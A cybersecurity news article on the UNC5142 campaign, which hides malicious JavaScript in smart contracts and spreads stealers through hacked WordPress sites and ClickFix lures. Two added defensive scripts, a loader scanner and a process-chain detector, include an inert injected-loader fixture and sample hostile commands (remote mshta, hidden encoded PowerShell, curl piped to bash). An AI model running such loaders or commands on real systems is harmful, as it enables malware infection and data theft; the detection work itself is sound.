Infected WordPress Sites Spreading Malware, while Hackers Exploit Blockchain Smart Contracts

“Now infected WordPress sites are becoming the medium to spread malware for hackers.”

Targeting both Windows and Apple macOS computers, a financially motivated threat actor tracked as UNC5142 has been observed abusing blockchain smart contracts to help spread information stealers such as Atomic (AMOS), Lumma, Rhadamanthys (also known as RADTHIEF), and Vidar.

Source: Google Threat Intelligence Group (GTIG), as reported by The Hacker News

“The use of compromised WordPress websites and ‘EtherHiding,’ a method of obscuring malicious code or data by putting it on a public blockchain like the BNB Smart Chain, are characteristics of UNC5142.”

To improve operational agility, the threat actor’s campaigns have undergone significant change over the past year. In November 2024, they switched from a single-contract system to a more advanced three-smart-contract system, with additional improvements noted earlier this January.

“The proxy pattern, a valid software design paradigm that developers utilize to make their contracts upgradeable, is adapted into this new architecture.”

“The configuration works as a very effective Router-Logic-Storage architecture, with a specific task assigned to each contract. Without changing the JavaScript on hijacked websites, this strategy enables quick adjustments to crucial attack components like the landing page URL or decryption key. The campaigns are therefore far more flexible and impervious to takedowns.”

“The Main infrastructure, distinguished by its early establishment and constant stream of upgrades, stands out as the fundamental campaign infrastructure.”

To support a particular spike in campaign activity, test new lures, or just increase operational resilience, “the secondary infrastructure appears as a parallel, more tactical deployment.”

“It is probable that UNC5142 has had some degree of success with their activities given the regular updates to the infection chain, the steady operational pace, the large number of compromised websites, and the variety of spread malware payloads over the previous year and a half.”

According to Google, as of June 2025 it had identified over 14,000 web pages containing injected JavaScript with behavior linked to UNC5142, suggesting that the group was indiscriminately targeting vulnerable WordPress websites.

Google also noted that it has not seen any UNC5142 activity since July 23, 2025, which could indicate a pause or a change in strategy.

In October 2023, Guardio Labs published the initial documentation of EtherHiding, which described attacks that used Binance’s Smart Chain (BSC) contracts to serve malicious code through compromised websites displaying phony browser update alerts.

A multi-stage JavaScript downloader called CLEARSHORT, which enables the malware to spread through the compromised websites, is a vital component that supports the attack chains.

The first stage is JavaScript malware injected into the websites; to reach the second stage, it connects to a malicious smart contract stored on the BNB Smart Chain (BSC) blockchain.

This first-stage malware is injected into theme files, plugin-related files, and occasionally even the WordPress database itself.

For its part, the smart contract is in charge of retrieving a CLEARSHORT landing page from an outside server. This page then uses the ClickFix social engineering technique to trick victims into executing malicious commands in the Windows Run dialog box (or the Terminal app on Macs), which allows stealer malware to infect the system.
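To make the first stage of this chain concrete from the defender's side, here is an added example (not code from the article, GTIG or WordPress) of a heuristic scanner for injected loaders of this shape: it walks a WordPress install and flags files that both talk to a BNB Smart Chain JSON-RPC node and turn fetched data into executable script. The indicator patterns, the file extensions, the `wp-content` layout assumption and the two fixtures (an inert synthetic loader using the zero address, and an ordinary theme footer) are all assumptions constructed for the example, not a published IoC list.

```python
"""Heuristic scanner for EtherHiding-style loaders injected into WordPress
theme, plugin and upload files.  Added example for this article; not code
from GTIG, Google or WordPress.  The indicator patterns are assumptions
derived from the article's description of the first stage (a JavaScript
snippet that queries a BNB Smart Chain node over JSON-RPC, reads contract
data, decodes it and executes the result); they are not a published IoC list."""
import os
import re
from dataclasses import dataclass, field

# Assumed heuristic indicators, in two families: evidence that the script
# talks to a BNB Smart Chain node, and evidence that it turns data into code.
CHAIN_INDICATORS = {
    # public BSC JSON-RPC endpoints commonly sit under binance.org / bnbchain.org
    "bsc_rpc_host": re.compile(r"https?://[\w.-]*(?:binance|bnbchain)\.org", re.I),
    # raw JSON-RPC contract read
    "json_rpc_eth_call": re.compile(r"[\"']eth_call[\"']"),
}
EXEC_INDICATORS = {
    "decode_routine": re.compile(r"\batob\s*\(|String\.fromCharCode\s*\("),
    "dynamic_script": re.compile(
        r"\beval\s*\(|new\s+Function\s*\(|createElement\s*\(\s*[\"']script[\"']", re.I),
}
SCAN_EXTENSIONS = {".php", ".js", ".html", ".htm"}


@dataclass
class Finding:
    path: str
    chain_hits: list[str] = field(default_factory=list)
    exec_hits: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Both families must fire: a Web3 plugin alone calls eth_call
        # legitimately, and a templating script alone creates script tags.
        return bool(self.chain_hits) and bool(self.exec_hits)


def scan_text(path: str, text: str) -> Finding:
    """Match both indicator families against one file's contents."""
    f = Finding(path)
    f.chain_hits = [name for name, rx in CHAIN_INDICATORS.items() if rx.search(text)]
    f.exec_hits = [name for name, rx in EXEC_INDICATORS.items() if rx.search(text)]
    return f


def scan_tree(root: str) -> list[Finding]:
    """Walk a WordPress install (wp-content is the usual place) and return a
    finding for every file where both indicator families match."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    finding = scan_text(path, fh.read())
            except OSError:
                continue
            if finding.suspicious:
                findings.append(finding)
    return findings


# Constructed fixtures (synthetic: the contract address is the zero address,
# the call data is empty and the endpoint is never contacted).  INJECTED has
# the loader shape the article describes; BENIGN is an ordinary theme footer.
INJECTED = """<?php wp_footer(); ?>
<script>(async()=>{const r=await fetch("https://bsc-dataseed.binance.org/",{method:"POST",
body:JSON.stringify({jsonrpc:"2.0",id:1,method:"eth_call",params:[{to:"0x0000000000000000000000000000000000000000",data:"0x"},"latest"]})});
const j=await r.json();const s=document.createElement("script");s.text=atob(j.result.slice(2));document.head.appendChild(s);})();</script>"""
BENIGN = """<?php wp_footer(); ?>
<script>jQuery(function($){$('.menu-toggle').on('click',function(){$('#nav').toggleClass('open');});});</script>"""

if __name__ == "__main__":
    import sys
    import tempfile
    root = sys.argv[1] if len(sys.argv) > 1 else None
    if root is None:  # no path given: demonstrate on the fixtures in a temp dir
        root = tempfile.mkdtemp()
        for name, body in (("footer.php", INJECTED), ("header.php", BENIGN)):
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
    for f in scan_tree(root):
        print(f"SUSPICIOUS {f.path}: chain={f.chain_hits} exec={f.exec_hits}")
```

Run it as `python scanner.py /var/www/html/wp-content` to sweep a real install; with no argument it scans the two fixtures and reports only `footer.php`. Requiring both indicator families is what keeps legitimate Web3 plugins and ordinary dynamic-script code out of the results; the database injection the article mentions needs a separate query of `wp_options` and `wp_posts` for the same patterns.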

As of December 2024, the landing pages, which are usually housed on a Cloudflare dev page, are retrieved in an encrypted way.

The malicious command on Windows systems involves running an HTML Application (HTA) file that was downloaded from a MediaFire URL. It then launches a PowerShell script to circumvent security measures, retrieves the encrypted final payload from MediaFire or GitHub, or sometimes their own infrastructure, and launches the stealer in memory without writing the artifact to disk.

In attacks against macOS in February and April 2025, attackers used ClickFix decoys to trick users into running a bash command in Terminal that fetched a shell script.

The script then retrieves the Atomic Stealer payload from the remote server using the curl command.
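The Windows and macOS ClickFix chains above reduce to a few process-creation relationships a defender can alert on: the Run dialog (explorer.exe) launching mshta.exe with a remote URL, mshta.exe spawning PowerShell, PowerShell run hidden or with an encoded command, and Terminal running a `curl ... | bash` pipeline. The following added example (not from the article, GTIG or any vendor rule set) runs that detection logic over constructed process events; the field names `parent_image`, `image` and `command_line`, and every path, URL and command in the sample events, are assumptions.

```python
"""Detection logic for the ClickFix execution chain described in the article
(Run dialog -> mshta -> PowerShell on Windows; Terminal -> curl | bash on
macOS), run over constructed process-creation events.  Added example; not
from the article, GTIG or any vendor ruleset.  Field names and all sample
values are assumptions."""
import re


def _basename(path: str) -> str:
    """Last path component for either Windows or POSIX paths, lower-cased."""
    return re.split(r"[\\/]", path)[-1].lower()


HIDDEN_OR_ENCODED = re.compile(
    r"-(?:w|windowstyle)\s+hidden|-(?:e|ec|enc|encodedcommand)\b", re.I)
CURL_PIPE_SHELL = re.compile(r"\bcurl\b.*\|\s*(?:ba|z)?sh\b", re.I)
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def classify(event: dict) -> list[str]:
    """Return the names of every rule the event trips (empty list if none)."""
    parent = _basename(event.get("parent_image", ""))
    image = _basename(event.get("image", ""))
    cmd = event.get("command_line", "")
    hits = []
    # A command pasted into Win+R runs as a child of explorer.exe.
    if parent == "explorer.exe" and image == "mshta.exe" and re.search(r"https?://", cmd, re.I):
        hits.append("run_dialog_remote_hta")
    if parent == "mshta.exe" and image in POWERSHELL:
        hits.append("hta_spawns_powershell")
    if image in POWERSHELL and HIDDEN_OR_ENCODED.search(cmd):
        hits.append("hidden_or_encoded_powershell")
    # macOS Terminal.app's executable is named Terminal.
    if "terminal" in parent and CURL_PIPE_SHELL.search(cmd):
        hits.append("terminal_curl_pipe_shell")
    return hits


def detect(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> rules tripped, for events that tripped at least one."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}


# Constructed sample events (hostnames use the reserved .invalid TLD; the
# -enc argument is base64 of the ASCII string PLACEHOLDER, not a real script).
EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://files.example.invalid/update.hta"},
    {"parent_image": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -ep bypass -enc UExBQ0VIT0xERVI="},
    {"parent_image": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "image": "/bin/bash",
     "command_line": "bash -c 'curl -fsSL https://dl.example.invalid/s.sh | bash'"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe notes.txt"},
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for idx, rules in detect(EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}  <- {EVENTS[idx]['command_line']}")
```

The first three events trip at least one rule each and the two benign ones trip none. In production these rules sit on Sysmon event ID 1 or EDR process telemetry; the parent-child relationships (explorer.exe to mshta.exe, mshta.exe to PowerShell) are the high-confidence signals, while the hidden/encoded PowerShell rule on its own needs tuning against administrative scripts.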

According to assessments, CLEARSHORT is a variation of ClearFake, which was the focus of a thorough investigation conducted in March 2025 by the French cybersecurity firm Sekoia. A malicious JavaScript framework called ClearFake is used on hacked websites to spread malware via drive-by downloads.

It has been known to operate since July 2023, and in May 2024 the attacks began using ClickFix. Abusing the blockchain brings a number of benefits, since the method not only blends in with legitimate Web3 activity but also makes UNC5142’s operations more resistant to discovery and takedown attempts.

To do this, UNC5142 takes advantage of the malleable nature of a smart contract’s data: the contract’s program code cannot be changed once it is published, but its stored data can, so changing the payload URL costs the group anywhere from $0.25 to $1.50 in network fees.

Subsequent investigation has revealed that the threat actor uses two different smart contract infrastructures to distribute stealer malware via the CLEARSHORT downloader. The main infrastructure was reportedly created on November 24, 2024, while the parallel secondary infrastructure was funded on February 18, 2025.

About The Author

Suraj Koli is a content specialist in technical writing about cybersecurity and information security. He has written many articles on cybersecurity concepts, covering the latest trends in cyber awareness and ethical hacking.
